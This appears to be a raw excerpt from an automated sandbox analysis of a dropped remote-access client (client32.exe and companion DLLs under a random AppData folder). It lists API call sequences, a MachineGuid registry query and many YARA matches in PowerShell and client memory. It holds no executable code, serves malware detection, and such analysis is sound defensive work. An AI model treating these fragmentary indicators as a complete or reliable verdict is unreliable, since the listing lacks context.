Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 10_2_1117594C
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey, 10_2_11145C70
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep, 10_2_11070430
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_6CA8A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange, 10_2_6CA8A980
Source: Yara match File source: 10.2.client32.exe.747f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.client32.exe.440000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.client32.exe.73a80000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.client32.exe.111b8c68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.client32.exe.6ca80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.26c00bcaaf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.26c00bc08a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.powershell.exe.26c00ba9ff8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2505080118.0000000002E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.1514998417.0000000000442000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6704, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: client32.exe PID: 4108, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL, type: DROPPED